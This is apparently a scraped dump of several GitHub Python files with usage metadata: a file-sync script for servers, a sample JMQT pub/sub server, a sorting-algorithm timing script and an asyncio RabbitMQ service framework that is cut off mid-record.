104, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 104, "usage_type": "name"}, {"api_name": "time.strftime", "line_number": 106, "usage_type": "call"}, {"api_name": "tele_util.executeSQL", "line_number": 110, "usage_type": "call"}, {"api_name": "tele_util.tryAndLogError", "line_number": 102, "usage_type": "attribute"}]} +{"seq_id": "39727261273", "text": "# -*- updateMasterFiles2Servers.py -*- #\n\"\"\"\nSYNOPSIS\n Copy the updated files from the master directory to the selected servers\n\nDESCRIPTION\n description of the functions\n \nEXAMPLES\n class listSrcFiles(folderSrc) - creates an object that contains folderSrc (the name of the subfolder in the source\n folder), path (the whole path of folderSrc), and listFiles (the list of files that need to be uploaded)\n def main(folderSrc, folderDest, folderSub) - upload files from folderSrc/folderSub to folderDest/folderSub\n\nVERSION 0.0\nAUTHOR\n Becket Hui 2020 07\n \n\"\"\"\nimport glob, logging, os, sys, time\nfrom shutil import copy\n\n\nclass listSrcFiles:\n def __init__(self, folderSrc):\n self.folderSrc = folderSrc\n self.pathSrc = ''\n self.listFiles = []\n\n\ndef main(folderSrc, folderDest, folderSub):\n # file types to copy:\n listExt = ['*.dll', '*.xml', '*.csv', '*.cs']\n # check if subfolders exist in source\n listSrcObj = []\n for subD in folderSub:\n path = os.path.join(folderSrc, subD)\n if not os.path.isdir(path):\n logger.error('Source folder ' + path + ' does not exist, exiting...')\n sys.exit(time.sleep(5))\n else:\n listObj = listSrcFiles(subD)\n listObj.pathSrc = path\n [listObj.listFiles.extend(glob.glob(os.path.join(path, extension))) for extension in listExt]\n listSrcObj.append(listObj)\n # start upload process\n logger.info('Start uploading process...')\n for destination in folderDest:\n # first check if destination folder exists\n if not os.path.isdir(destination):\n logger.warning('Destination ' + destination + ' cannot be found, skipping...')\n continue\n for srcObj in listSrcObj:\n # check if subfolder exists in the destination\n destPath = os.path.join(destination, srcObj.folderSrc)\n if not os.path.isdir(destPath):\n logger.warning(destPath + ' does not exist, skipping...')\n continue\n # if subfolder exists, copy newer files from source to destination\n logger.info('Copying files from ' + srcObj.folderSrc + ' to ' + destination)\n for srcFile in srcObj.listFiles:\n srcTime = os.path.getmtime(srcFile)\n destFilePath = os.path.join(destPath, os.path.basename(srcFile))\n destTime = os.path.getmtime(destFilePath) if os.path.exists(destFilePath) else None\n if destTime is None or destTime < srcTime:\n copy(srcFile, destFilePath)\n logger.debug('Copy ' + srcFile + ' to ' + destination + ' completed.')\n else:\n logger.debug('Skip copying ' + srcFile + ', file in ' + destination + ' is newer.')\n return\n\n\nif __name__ == '__main__':\n folderCurr = os.path.dirname(os.path.abspath(__file__))\n try:\n settingFile = os.path.join(folderCurr, 'updateMasterFilesSettings.txt')\n readDirSrc = False\n readDirDest = False\n readSubFolder = False\n folderSrc = ''\n folderSub = []\n folderDest = []\n with open(settingFile, 'r') as filePt:\n for line in filePt:\n if line.rstrip() == 'Source:':\n readDirSrc = True\n readDirDest = False\n readSubFolder = False\n continue\n if line.rstrip() == 'Destinations:':\n readDirSrc = False\n readDirDest = True\n readSubFolder = False\n continue\n if line.rstrip() == 'Subfolders:':\n readDirSrc = False\n readDirDest = False\n readSubFolder = True\n continue\n if 
readDirSrc is True:\n folderSrc = line.rstrip()\n if readDirDest is True:\n folderDest.append(line.rstrip())\n if readSubFolder is True:\n folderSub.append(line.rstrip())\n except:\n print('Error in reading ' + settingFile + '!!')\n sys.exit(time.sleep(5))\n try:\n logFile = os.path.join(folderCurr, 'log.txt')\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG) # need to set logger level to lowest\n # set file handler\n fileHandler = logging.FileHandler(logFile, mode='w')\n fileHandler.setFormatter(logging.Formatter('%(asctime)s: %(levelname)-8s %(message)s',\n datefmt='%Y/%m/%d %H:%M:%S'))\n fileHandler.setLevel(logging.DEBUG)\n logger.addHandler(fileHandler)\n # set console handler\n consoleHandler = logging.StreamHandler()\n consoleHandler.setFormatter(logging.Formatter('%(message)s'))\n consoleHandler.setLevel(logging.INFO)\n logger.addHandler(consoleHandler)\n except:\n print('Cannot open ' + logFile + ', please close the log file and restart.')\n sys.exit(time.sleep(5))\n logger.info('Start updateMasterFiles2Servers')\n logger.debug('Source folder:')\n logger.debug(folderSrc)\n logger.debug('Destination folders:')\n [logger.debug(folder) for folder in folderDest]\n main(folderSrc, folderDest, folderSub)\n logger.info('Transfer completed.')\n sys.exit(time.sleep(10))", "repo_name": "x2sky/Py_AOAupdateServerFiles", "sub_path": "updateMasterFiles2Servers.py", "file_name": "updateMasterFiles2Servers.py", "file_ext": "py", "file_size_in_byte": 5426, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 39, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.getmtime", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.getmtime", "line_number": 63, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 73, "usage_type": "call"}, 
{"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 107, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 110, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 111, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 113, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 114, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 116, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 119, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 120, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 121, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 125, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 125, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 133, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 133, "usage_type": "call"}]} +{"seq_id": "15296288537", "text": "import os\nroot_path = os.path.dirname(os.path.realpath(__file__))\n# path where pyjmqt.server package is saved\nmodules_root_path = os.path.dirname(root_path)\nimport json\nimport threading\nimport asyncio\nimport sys\n# if the modules_root_path is not in sys.path, we have to insert it to sys.path before importing pyjmqt.server\nif modules_root_path not in sys.path:\n sys.path.insert(0, modules_root_path)\nfrom pyjmqt.server.api import Server\n\n# JMQT application class defines and implements the main application\nclass MyJMQTApp():\n # constructor of the JMQT application class\n def __init__(self, loop):\n # the eventloop passed during the object creation\n self.loop = loop\n # setup the JMQT server\n self.configFile = os.path.join(root_path, 'server.conf')\n\n # create the object of JMQT Server\n self.server = Server(self.loop, self.configFile)\n\n # register the callbacks, all are mandatory\n # validation callbacks\n self.server.set_authentication_validator(self.validate_auth)\n self.server.set_connection_validator(self.validate_conn)\n self.server.set_subscription_validator(self.validate_sub)\n self.server.set_publish_validator(self.validate_pub)\n # handler callbacks\n self.server.set_control_channel_handler(self.control_packet_handler)\n # notifier callbacks\n self.server.set_unsubscription_validator(self.validate_unsub)\n self.server.set_disconnection_notifier(self.disconnection_notifier)\n self.server.set_conn_close_notifier(self.conn_close_notifier)\n\n # gets the server logger (may be used to log all information at a place)\n self.logger = self.server.get_logger()\n # 4 methods are available for logging, i.e:\n # log_info, log_debug, log_warning, and log_error\n self.logger.log_info('Server Start', 'MyJMQTApp')\n # gets the server config in a dictionary\n self.serverConfig = self.server.get_server_config()\n # to access a config item, we can use self.serverConfig['']\n # e.g. 
self.serverConfig['MONGO_HOST']\n        # update channel will be used to inform other clients when a client is online or offline\n        self.UpdateChannel = 'update'\n\n    async def validate_auth(self, auth_data, remote_host, protocol):\n        \"\"\"\n        Validates authentication request.\n\n        Called when a client sends auth request. This function must authenticate the client and return\n        authentication status with client id and optional message (reason why authentication is not OK)\n\n        :param auth_data: Authentication data sent by the client (any, usually dictionary)\n        :param remote_host: Remote host which the client is connecting from (string)\n        :param protocol: Protocol which the client is connecting from (string)\n        :return: returns a tuple with status code (boolean), client id (string), auth token(string) and message (string)\n        message can be blank, it must contain the reason if the authentication fails\n        \"\"\"\n        status_code, client_id, token, message = self.server.StatusCodes.FAILED, '', '', ''\n        # for the sample server, we will use the client_name field to authenticate a client\n        # here we are authenticating all clients, this authentication will be application specific\n        if 'client_name' in auth_data:\n            uid = auth_data['client_name']\n            client_id = str(uid)\n            status_code = self.server.StatusCodes.OK\n            token = \"test-token\"\n        else:\n            status_code = self.server.StatusCodes.INVALID_PACKET\n            message = \"Invalid auth data, client_name is missing\"\n        return (status_code, client_id, token, message)\n\n    async def validate_conn(self, client_id, auth_token, remote_host, protocol):\n        \"\"\"\n        Validates connection request.\n\n        Called when a client sends conn request. This function must allow or deny the client to connect\n\n        :param client_id: Client id of the client (string)\n        :param auth_token: Auth token previously sent from validate_auth function (string)\n        :param remote_host: Remote host which the client is connecting from (string)\n        :param protocol: Protocol which the client is connecting from (string)\n        :return: returns status code (boolean)\n        \"\"\"\n        if auth_token == \"test-token\":\n            # here we need to add the default channels for the client\n            # for example, we are adding the p2p channel here\n            await self.server.force_sub(client_id, '#' + client_id, persistent_flag = 1)\n            # next we will add the update channel\n            await self.server.force_sub(client_id, self.UpdateChannel, persistent_flag = 1)\n            # now we will send the connection info to the update channel\n            await self.server.force_pub(self.UpdateChannel, {'online': client_id}, qos = 0, retain = 0)\n            return self.server.StatusCodes.OK\n        else:\n            return self.server.StatusCodes.INVALID_TOKEN\n    \n    async def validate_sub(self, client_id, channel, persistent_flag, remote_host, protocol):\n        \"\"\"\n        Validates subscription request.\n\n        Called when a client sends sub request. 
This function must allow or deny the subscription\n\n        :param client_id: Client id of the client (string)\n        :param channel: channel name which the client wants to subscribe to (string)\n        :param persistent_flag: indicates if the subscription is persistent or not (boolean)\n        :param remote_host: Remote host which the client is connecting from (string)\n        :param protocol: Protocol which the client is connecting from (string)\n        :return: returns status code (boolean)\n        \"\"\"\n        # here we will reject any subscription to update channel\n        # this channel is reserved for the server\n        if channel == self.UpdateChannel:\n            return self.server.StatusCodes.NOT_ALLOWED\n        return self.server.StatusCodes.OK\n    \n    async def validate_unsub(self, client_id, channel, remote_host, protocol):\n        \"\"\"\n        Validates unsubscription request.\n\n        Called when a client sends unsub request. This function must allow or deny the unsubscription\n\n        :param client_id: Client id of the client (string)\n        :param channel: channel name which the client wants to unsubscribe from (string)\n        :param remote_host: Remote host which the client is connecting from (string)\n        :param protocol: Protocol which the client is connecting from (string)\n        :return: returns status code (boolean)\n        \"\"\"\n        # here we will reject any unsubscription from update channel\n        # this channel is reserved for the server\n        if channel == self.UpdateChannel:\n            return self.server.StatusCodes.NOT_ALLOWED\n        return self.server.StatusCodes.OK\n    \n    async def validate_pub(self, client_id, channel, data, qos, remote_host, protocol):\n        \"\"\"\n        Validates publish request.\n\n        Called when a client sends pub request. This function must allow or deny the publish\n\n        :param client_id: Client id of the client (string)\n        :param channel: channel name which the client wants to publish the data (string)\n        :param data: published data by the client (any, usually dictionary)\n        :param remote_host: Remote host which the client is connecting from (string)\n        :param protocol: Protocol which the client is connecting from (string)\n        :return: returns status code (boolean)\n        \"\"\"\n        # here we will reject any publish to update channel\n        # this channel is reserved for the server\n        if channel == self.UpdateChannel:\n            return self.server.StatusCodes.NOT_ALLOWED\n        return self.server.StatusCodes.OK    \n\n    async def control_packet_handler(self, client_id, channel, data, remote_host, protocol):\n        \"\"\"\n        Handles publish requests to control channels.\n\n        Called when a client sends a control data request (pub request to control channels starts with $ sign).\n        This function must return the relevant data with status code\n\n        :param client_id: Client id of the client (string)\n        :param channel: control channel name (string)\n        :param data: request data by the client (any, usually dictionary)\n        :param remote_host: Remote host which the client is connecting from (string)\n        :param protocol: Protocol which the client is connecting from (string)\n        :return: returns tuple with status code (boolean) and response data (any)\n        \"\"\"\n        # returns a list of subscribed channels by the client\n        if channel == '$mySubscriptions':\n            response_data = {'channels' : await self.server.get_subscriptions(client_id)}\n        # e.g. 
response_data = {'msg': 'hi'}\n        return (self.server.StatusCodes.OK, response_data)\n    \n    async def disconnection_notifier(self, client_id, remote_host, protocol):\n        \"\"\"\n        Notifies when a client sends the disconn packet\n\n        Called when a client sends the disconn packet\n\n        :param client_id: Client id of the client (string)\n        :param remote_host: Remote host which the client was connected from (string)\n        :param protocol: Protocol which the client was connected from (string)\n        :return: returns nothing\n        \"\"\"\n        # now we will send the connection info to the update channel\n        await self.server.force_pub(self.UpdateChannel, {'offline': client_id}, qos = 0, retain = 0)\n\n    async def conn_close_notifier(self, client_id, remote_host, protocol):\n        \"\"\"\n        Notifies when a client closes the socket\n\n        Called when a client closes the socket\n\n        :param client_id: Client id of the client (string)\n        :param remote_host: Remote host which the client was connected from (string)\n        :param protocol: Protocol which the client was connected from (string)\n        :return: returns nothing\n        \"\"\"\n        # we can notify the other clients about this event using force_pub message\n        await self.server.force_pub(self.UpdateChannel, {'offline': client_id}, qos = 0, retain = 0)\n\n    def start(self):\n        \"\"\"\n        call the start server function\n        \"\"\"\n        self.logger.log_info('Server start', 'MyJMQTApp')\n        self.server.start()\n    \n    def stop(self):\n        \"\"\"\n        call the stop server function\n        \"\"\"\n        self.logger.log_info('Server stop', 'MyJMQTApp')\n        self.server.stop()\n\nif __name__ == '__main__':\n    # get the asyncio event loop\n    loop = asyncio.get_event_loop()\n    # pass the loop to the app\n    myApp = MyJMQTApp(loop)\n    # start the server\n    myApp.start()\n    try:\n        # run the loop and wait for the KeyboardInterrupt\n        loop.run_forever()\n    except KeyboardInterrupt:\n        pass\n    # if Interrupt is received, stop the server\n    myApp.stop()", "repo_name": "shubhadeepb14/jmqt", "sub_path": "examples/sample_server.py", "file_name": "sample_server.py", "file_ext": "py", "file_size_in_byte": 10880, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 2, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 2, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "sys.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pyjmqt.server.api.Server", "line_number": 24, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 221, "usage_type": "call"}]} +{"seq_id": "21618329098", "text": "from datetime import datetime\r\nimport random\r\n\r\ndef bubblesort(arr):\r\n    for i in range(len(arr)):\r\n        for j in range(len(arr) - i - 1):\r\n            if arr[j] > arr[j + 1]:\r\n                arr[j], arr[j + 1] = arr[j + 1], arr[j]\r\n    return arr\r\n\r\ndef insertionsort(arr):\r\n    for i in range(1, len(arr)): # n\r\n        j = i\r\n        while j > 0 and arr[j] < arr[j - 1]: # While the current element is smaller than the preceding element (n)\r\n            # Swap\r\n            arr[j], arr[j - 1] = arr[j - 1], arr[j]\r\n            j -= 1\r\n    return 
arr\r\n\r\n\r\ndef quicksort(arr):\r\n    if len(arr) < 2:\r\n        return arr\r\n    else:\r\n        pivot = arr[-1]\r\n        equal, smaller, larger = [], [], []\r\n        for i in arr:\r\n            if i < pivot:\r\n                smaller.append(i)\r\n            elif i == pivot:\r\n                equal.append(i)\r\n            else:\r\n                larger.append(i)\r\n        return quicksort(smaller) + equal + quicksort(larger)\r\n\r\ndef selectionsort(arr):\r\n    for i in range(len(arr)): # n\r\n        for j in range(i, len(arr)): # n\r\n            if arr[j] < arr[i]:\r\n                arr[i], arr[j] = arr[j], arr[i]\r\n    return arr\r\n\r\ndef mergesort(arr):\r\n    if len(arr) > 1:\r\n        mid = len(arr) // 2 # Finding mid of the array\r\n        left = arr[:mid] # Dividing Array into 2 halves\r\n        right = arr[mid:] # Dividing Array into 2 halves\r\n\r\n        mergesort(left) # Sorting Left Half\r\n        mergesort(right) # Sorting Right Half\r\n\r\n        i = j = k = 0\r\n\r\n        while i < len(left) and j < len(right):\r\n            if left[i] < right[j]: # If the element in the left half is smaller than the one in the right, it is written back first\r\n                arr[k] = left[i] # Place the element into the original array\r\n                i += 1\r\n            else:\r\n                arr[k] = right[j]\r\n                j += 1\r\n            k += 1\r\n\r\n        # Right half exhausted, copy the remaining (sorted) left half\r\n        while i < len(left):\r\n            arr[k] = left[i]\r\n            i += 1\r\n            k += 1\r\n\r\n        # Left half exhausted, copy the remaining (sorted) right half\r\n        while j < len(right):\r\n            arr[k] = right[j]\r\n            j += 1\r\n            k += 1\r\n\r\n    return arr\r\n\r\ndef shellsort(arr):\r\n\r\n    gap = len(arr) // 2\r\n    while gap > 0:\r\n        for i in range(gap, len(arr)):\r\n            temp = arr[i]\r\n            j = i\r\n            while j >= gap and arr[j - gap] > temp: # Shift elements larger than temp one gap to the right\r\n                arr[j] = arr[j - gap]\r\n                j -= gap\r\n            arr[j] = temp\r\n        gap //= 2\r\n    return arr\r\n\r\n\r\ndef randomArrayGenerator(n):\r\n    return list(set(random.randint(1, 10000) for i in range(n+1)))\r\n\r\narr = randomArrayGenerator(1001)\r\n\r\ndef timeanalysis(func, arr):\r\n    start = datetime.now()\r\n    func(arr)\r\n    end = datetime.now()\r\n    print(f'Time Taken for {func} to Sort:', end - start)\r\n\r\ntimeanalysis(bubblesort, arr)\r\ntimeanalysis(insertionsort, arr)\r\ntimeanalysis(quicksort, arr)\r\ntimeanalysis(selectionsort, arr)\r\ntimeanalysis(mergesort, arr)\r\ntimeanalysis(shellsort, arr)\r\n\r\n'''\r\nOn average, insertion sort has the fastest run time!\r\n'''\r\n\r\n", "repo_name": "peanutsee/Data-Structures-and-Algorithms-Python", "sub_path": "Sorting Algorithms (DONE)/Time Complexity Analysis/Time Complexity Analysis.py", "file_name": "Time Complexity Analysis.py", "file_ext": "py", "file_size_in_byte": 3168, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "random.randint", "line_number": 93, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 98, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 100, "usage_type": "name"}]} +{"seq_id": "37431596320", "text": "\"\"\"Main main_service module.\"\"\"\nimport argparse\nimport asyncio\nimport json\nimport logging\nimport os\nimport signal\nimport sys\nfrom contextlib import suppress\nfrom logging.handlers import TimedRotatingFileHandler\nfrom typing import TextIO, Type\n\nfrom service_framework.base_broker import BaseBroker\nfrom service_framework.base_handler import BaseHandler\nfrom service_framework.base_service import BaseService\nfrom 
service_framework.broker.rabbit_broker_async import RabbitBrokerAsync\nfrom service_framework.config_service import ServiceConfig\n\nos.environ['no_proxy'] = '*'\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\n\ndef set_logger(log_path: str, log_name: str, log_level: str = 'DEBUG') -> None:\n \"\"\"\n Set up logger according settings.\n\n Args:\n log_level (str): Logger level.\n log_path (str): File path to save log.\n log_name (str): File name to save log\n\n Raises:\n Exception: if error in logger setting up.\n\n \"\"\"\n try:\n logger_handler = TimedRotatingFileHandler(\n os.path.join(\n log_path,\n '{0}.log'.format(log_name),\n ),\n when='W6',\n )\n except Exception:\n logger.exception('Logger has error while setting up handler.')\n raise\n try:\n logger_handler.setLevel(log_level.upper())\n except Exception:\n logger.exception('Logger has error while setting up level.')\n formatter = logging.Formatter(\n '{asctime} :: {name:22s} :: {levelname:8s} :: {message}',\n style='{',\n )\n logger_handler.setFormatter(formatter)\n logger.addHandler(logger_handler)\n logger.info('Logger has been successfully set up.')\n\n\ndef load_config(config_file: TextIO) -> ServiceConfig:\n \"\"\"\n Load configuration from json-file and structuring into a class-notation.\n\n Args:\n config_file (TextIO): file with config\n\n Raises:\n Exception: if error while getting configuration.\n\n Returns:\n loaded_config (MainConfig): Config for Zabbix, Redis, Psql, logger.\n\n \"\"\"\n try:\n loaded_config = ServiceConfig(\n **json.loads(\n config_file.read(),\n ),\n )\n except Exception:\n logger.exception('Error getting configuration')\n raise\n return loaded_config\n\n\ndef load_routes(routes_file: str) -> dict:\n \"\"\"\n Load queues from json-file and structuring into a class-notation.\n\n Args:\n routes_file (str): path to queue settings file\n\n Raises:\n Exception: if error while getting configuration.\n FileExistsError: if queue file does not exists.\n\n Returns:\n loaded_routes (MainConfig): List of queues.\n\n \"\"\"\n if os.path.exists(routes_file):\n with open(routes_file, 'r') as q_file:\n try:\n loaded_routes = json.loads(\n q_file.read(),\n )\n except Exception:\n logger.exception('Error getting queue configuration')\n raise\n else:\n logger.error('Queue settings file does not exists.')\n raise FileExistsError\n return loaded_routes\n\n\ndef launch_service(callback_handler: Type[BaseHandler], *args, **kwargs):\n \"\"\"\n Make preparation and start service.\n\n Init argument parser and parse command line.\n Load config and add extra data to it.\n Set logger.\n Create, init and start service.\n\n Args:\n callback_handler (Type[BaseHandler]): handler instance to callback\n args: extra arguments for handler constructor\n kwargs: extra key arguments for handler constructor\n\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-C',\n '--config',\n help='Required. Path to file with configurations',\n required=True,\n type=argparse.FileType('r'),\n dest='config_file',\n )\n parser.add_argument(\n '-s',\n '--service',\n help='Required. 
Service name to identify it',\n        required=True,\n        type=str,\n        dest='service_name',\n    )\n    parsed_args = parser.parse_args()\n\n    config = load_config(config_file=parsed_args.config_file)\n    config.identifier = parsed_args.service_name\n\n    set_logger(\n        log_path=config.log_file,\n        log_name=parsed_args.service_name,\n        log_level=config.log_level,\n    )\n\n    new_service = ServiceFramework(\n        config=config,\n        callback_handler=callback_handler,\n    )\n    new_service.prepare_to_run(*args, **kwargs)\n    new_service.service_run()\n\n\n# noinspection PyArgumentList\nclass AsyncService(object):\n    \"\"\"Async service class implementation.\"\"\"\n\n    def __init__(\n        self,\n        config: ServiceConfig,\n        callback_handler: Type[BaseHandler],\n    ):\n        \"\"\"\n        Init service instance.\n\n        Args:\n            config (ServiceConfig): configuration data\n            callback_handler (Type[BaseHandler]): handler to run callback\n\n        \"\"\"\n        self.loop = self._create_loop()\n        self.config = config\n        self.broker: Type[BaseBroker] = RabbitBrokerAsync\n        self.callback_handler: Type[BaseHandler] = callback_handler\n\n    def _create_loop(self):\n        \"\"\"\n        Create event loop and set up signal handlers.\n\n        Returns:\n            loop: asyncio event loop\n        \"\"\"\n        loop = asyncio.get_event_loop()\n        signals = (signal.SIGHUP, signal.SIGTERM, signal.SIGINT)\n        for sig in signals:\n            loop.add_signal_handler(\n                sig,\n                self._process_sig_callback_sync,\n            )\n        return loop\n\n    def _process_sig_callback_sync(self):\n        \"\"\"Convert async callback function to sync.\"\"\"\n        self.loop.create_task(self._process_sig_callback())\n\n    async def _process_sig_callback(self):\n        tasks = [\n            task for task in asyncio.Task.all_tasks() if task is not\n            asyncio.tasks.Task.current_task()\n        ]\n        with suppress(asyncio.exceptions.CancelledError):\n            list(\n                map(\n                    lambda task: task.cancel(),\n                    tasks,\n                ),\n            )\n        pending_tasks = await asyncio.gather(\n            *tasks,\n            return_exceptions=True,\n        )\n        logger.info(\n            'Finished pending tasks: {0}'.format(\n                pending_tasks,\n            ),\n        )\n        await self.broker.stop()\n        await self.callback_handler.stop_handler()\n        self.loop.stop()\n        logger.info('Service has been stopped.')\n\n\nclass ServiceFramework(AsyncService, BaseService):\n    \"\"\"Service-framework class implementation.\"\"\"\n\n    def prepare_to_run(self, *args, **kwargs):\n        \"\"\"\n        Do preparation before service start.\n\n        Args:\n            args: extra arguments for handler constructor\n            kwargs: extra key arguments for handler constructor\n\n        \"\"\"\n        self._take_routes()\n        self._create_callback_handler(*args, **kwargs)\n        self._create_broker()\n        self.callback_handler.prepare_handler(\n            config=self.config.handler_config,\n            publisher=self.broker.publish,\n        )\n        logger.info(\n            'Init main_service: success. Identifier: \"{0}\"'.format(\n                self.config.identifier,\n            ),\n        )\n\n    def service_run(self):\n        \"\"\"\n        Start service running.\n\n        If the service type is publisher, run the handler as the main process.\n        \"\"\"\n        if self.config.type == 'publisher':\n            self.loop.create_task(self.callback_handler.call_handler())\n        else:\n            self.loop.create_task(self.broker.consume())\n        try:\n            self.loop.run_forever()\n        except Exception as exception:\n            logger.exception(\n                'Could not start service. {0}'.format(\n                    exception,\n                ),\n            )\n            sys.exit(1)\n        finally:\n            self.loop.close()\n\n    def _create_broker(self):\n        try:\n            self.broker = self.broker(\n                config=self.config.broker_config,\n                callback_handler=self.callback_handler.call_handler,\n                loop=self.loop,\n            )\n        except Exception as exception:\n            logger.exception(\n                'Init main_service: broker was not created. 
{0}'.format(\n                    exception,\n                ),\n            )\n            raise NotImplementedError('Broker was not set up.')\n        logger.info('Broker has been created successfully.')\n\n    def _create_callback_handler(self, *args, **kwargs):\n        try:\n            self.callback_handler = self.callback_handler(*args, **kwargs)\n        except Exception as exception:\n            logger.exception(\n                'Init main_service: handler was not created. {0}'.format(\n                    exception,\n                ),\n            )\n            raise NotImplementedError('Handler was not set up.')\n        logger.info('Handler has been created successfully.')\n\n    def _take_routes(self):\n        try:\n            routes = list(\n                filter(\n                    lambda route: route['service'] == self.config.identifier,\n                    load_routes(routes_file=self.config.routes_file),\n                ),\n            )[0]['routes']\n        except Exception:\n            logger.exception('Routes were not provided.')\n            raise ValueError('Routes were not provided.')\n        if self.config.type in {'consumer', 'all'}:\n            try:\n                self.config.broker_config['route_consume'] = routes['consume']\n            except Exception as exception:\n                logger.exception(\n                    'Error getting consume route. {0}'.format(\n                        exception,\n                    ),\n                )\n                raise\n        if self.config.type in {'publisher', 'all'}:\n            try:\n                self.config.handler_config['route_publish'] = routes['publish']\n            except Exception as excptn:\n                logger.exception(\n                    'Error while filtering publish queues. {0}'.format(\n                        excptn,\n                    ),\n                )\n                raise\n", "repo_name": "KonsKo/RabbitMQ_microservices_remote_controller", "sub_path": "service_framework/service_async.py", "file_name": "service_async.py", "file_ext": "py", "file_size_in_byte": 10234, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 22, "usage_type": "attribute"}, {"api_name": "logging.handlers.TimedRotatingFileHandler", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 53, "usage_type": "call"}, {"api_name": "typing.TextIO", "line_number": 62, "usage_type": "name"}, {"api_name": "service_framework.config_service.ServiceConfig", "line_number": 77, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 78, "usage_type": "call"}, {"api_name": "service_framework.config_service.ServiceConfig", "line_number": 62, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 106, "usage_type": "call"}, {"api_name": "typing.Type", "line_number": 118, "usage_type": "name"}, {"api_name": "service_framework.base_handler.BaseHandler", "line_number": 118, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 133, "usage_type": "call"}, {"api_name": "argparse.FileType", "line_number": 139, "usage_type": "call"}, {"api_name": "service_framework.config_service.ServiceConfig", "line_number": 175, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 176, "usage_type": "name"}, {"api_name": "service_framework.base_handler.BaseHandler", "line_number": 176, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 188, "usage_type": "name"}, {"api_name": "service_framework.base_broker.BaseBroker", "line_number": 188, "usage_type": "name"}, {"api_name": 
